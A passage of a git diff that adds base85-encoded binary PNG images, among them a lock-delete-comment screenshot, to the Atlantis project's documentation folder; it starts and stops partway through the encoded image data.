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
Q?V`Vo^h|Y8+E>H>3+syDqyPW_

literal 0
HcmV?d00001

diff --git a/runatlantis.io/docs/images/lock-delete-comment.png b/runatlantis.io/docs/images/lock-delete-comment.png
new file mode 100644
index 0000000000000000000000000000000000000000..db452bf56830abd521621c425238586b6cbce412
GIT binary patch
literal 65499
zcmeFYXH-+|);3B}Q2`N<F493jh;->Fy(1zWLT{mm-Vp_nUL#$)NbgdEBE5qIDFNv<
z^bkl0Ir!}T?fvZU-G9!H^XH5=V<c;3t#!9K=RNDSqII;CN$=9%#lyoRRaH^Y#lyQ<
zfrp3Rbo<uzl@!x&Q+RkJJdX16I;!&W%sQTKc8<=rcz7z&X%Hg4lmY6nO@OM3ibJ?g
z(c47@?#bdAJObUD3@mrpQ)wyQyk|7iv*7#u-b&Fx(HVqq^OBsHn)=%!6SYpNcddo|
zx+aC3!C2ryd*J9L4kGEhzYr*d%cjHAE1YG0N&V%PT+>s7hm<R0*{P|+?9v1Zas-2N
zL{EP`jP3_WND#=;h2UN-!tvhk1y5^j>~3D+cy>&4-xA_ckcy}AF5Ae<5a8{9Cyxf>
zGoQZb*d8_|w_%N?aQI*umN;UQU1cFgSIYD3g)1cuC7$?AJPw{LJ}n|SMQR$Mgp_;O
z&#5n(XgqJe=#NY65DyZiIkxXFtgpA1({Fs^oQBTHI}JV8U_2VID@~|jrD=J5^DcYA
zld}q3{X?8dU42nE_~Un_^%!|;8}Xr?ba6J*UcLU!cV$U06GfPTl<w<ig8Lil@~csM
zvhM8oHFjb6cxvl)gxxH=@}lH+ib^Eg9aA^HJ?XDGbI4|fP?gfgc=iZcMP3$ONU7@V
